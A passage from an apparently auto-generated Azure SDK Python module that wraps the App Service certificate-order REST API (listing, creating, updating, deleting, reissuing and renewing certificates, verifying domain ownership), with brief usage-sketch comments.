update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
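# Usage sketch (assumes the `client` shown above and an
# AppServiceCertificateOrderPatchResource `patch`): update issues a PATCH,
# unlike the PUT-based long-running operation above:
#   updated = client.app_service_certificate_orders.update("my-rg", "my-order", patch)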
def list_certificates(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateCollection"]
"""List all certificates associated with a certificate order.
List all certificates associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_certificates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates'} # type: ignore
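# Usage sketch (assumes the `client` shown above): certificates under an
# order page the same way as list_by_resource_group:
#   for cert in client.app_service_certificate_orders.list_certificates("my-rg", "my-order"):
#       print(cert.name)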
def get_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
"""Get the certificate associated with a certificate order.
Get the certificate associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
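# Usage sketch (assumes the `client` shown above):
#   cert = client.app_service_certificate_orders.get_certificate(
#       "my-rg", "my-order", "my-cert")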
def _create_or_update_certificate_initial(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificateResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_certificate_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(key_vault_certificate, 'AppServiceCertificateResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_certificate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def begin_create_or_update_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificateResource"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.AppServiceCertificateResource"]
"""Creates or updates a certificate and associates with key vault secret.
Creates or updates a certificate and associates with key vault secret.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:param key_vault_certificate: Key vault certificate resource.
:type key_vault_certificate: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceCertificateResource or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_certificate_initial(
resource_group_name=resource_group_name,
certificate_order_name=certificate_order_name,
name=name,
key_vault_certificate=key_vault_certificate,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
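# Usage sketch (assumes the `client` shown above and an
# AppServiceCertificateResource `cert_spec` referencing a Key Vault secret):
#   poller = client.app_service_certificate_orders.begin_create_or_update_certificate(
#       "my-rg", "my-order", "my-cert", cert_spec)
#   cert = poller.result()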
def delete_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete the certificate associated with a certificate order.
Delete the certificate associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.delete_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def update_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificatePatchResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
"""Creates or updates a certificate and associates with key vault secret.
Creates or updates a certificate and associates with key vault secret.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:param key_vault_certificate: Key vault certificate resource.
:type key_vault_certificate: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificatePatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(key_vault_certificate, 'AppServiceCertificatePatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def reissue(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
reissue_certificate_order_request, # type: "_models.ReissueCertificateOrderRequest"
**kwargs # type: Any
):
# type: (...) -> None
"""Reissue an existing certificate order.
Reissue an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param reissue_certificate_order_request: Parameters for the reissue.
:type reissue_certificate_order_request: ~azure.mgmt.web.v2018_02_01.models.ReissueCertificateOrderRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.reissue.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(reissue_certificate_order_request, 'ReissueCertificateOrderRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reissue.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/reissue'} # type: ignore
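# Usage sketch (assumes the `client` shown above and a
# ReissueCertificateOrderRequest `reissue_request` from the models package);
# a 204 response returns None:
#   client.app_service_certificate_orders.reissue("my-rg", "my-order", reissue_request)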
def renew(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
renew_certificate_order_request, # type: "_models.RenewCertificateOrderRequest"
**kwargs # type: Any
):
# type: (...) -> None
"""Renew an existing certificate order.
Renew an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param renew_certificate_order_request: Renew parameters.
:type renew_certificate_order_request: ~azure.mgmt.web.v2018_02_01.models.RenewCertificateOrderRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.renew.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(renew_certificate_order_request, 'RenewCertificateOrderRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/renew'} # type: ignore
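# Usage sketch (assumes the `client` shown above and a
# RenewCertificateOrderRequest `renew_request` from the models package):
#   client.app_service_certificate_orders.renew("my-rg", "my-order", renew_request)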
def resend_email(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Resend certificate email.
Resend certificate email.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.resend_email.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
resend_email.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/resendEmail'} # type: ignore
def resend_request_emails(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name_identifier, # type: "_models.NameIdentifier"
**kwargs # type: Any
):
# type: (...) -> None
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name_identifier: Email address.
:type name_identifier: ~azure.mgmt.web.v2018_02_01.models.NameIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.resend_request_emails.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(name_identifier, 'NameIdentifier')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
resend_request_emails.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/resendRequestEmails'} # type: ignore
def retrieve_site_seal(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
site_seal_request, # type: "_models.SiteSealRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.SiteSeal"
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param site_seal_request: Site seal request.
:type site_seal_request: ~azure.mgmt.web.v2018_02_01.models.SiteSealRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SiteSeal, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.SiteSeal
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SiteSeal"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.retrieve_site_seal.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(site_seal_request, 'SiteSealRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SiteSeal', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_site_seal.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/retrieveSiteSeal'} # type: ignore
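# Usage sketch (assumes the `client` shown above and SiteSealRequest from
# the models package):
#   seal_request = SiteSealRequest(light_theme=True, locale="en-us")
#   seal = client.app_service_certificate_orders.retrieve_site_seal(
#       "my-rg", "my-order", seal_request)
#   print(seal.html)  # embeddable site-seal markup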
def verify_domain_ownership(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.verify_domain_ownership.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
verify_domain_ownership.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/verifyDomainOwnership'} # type: ignore
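# Usage sketch (assumes the `client` shown above); a body-less POST that
# triggers domain verification and returns None on 204:
#   client.app_service_certificate_orders.verify_domain_ownership("my-rg", "my-order")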
def retrieve_certificate_actions(
self,
resource_group_name, # type: str
name, # type: str
**kwargs # type: Any
):
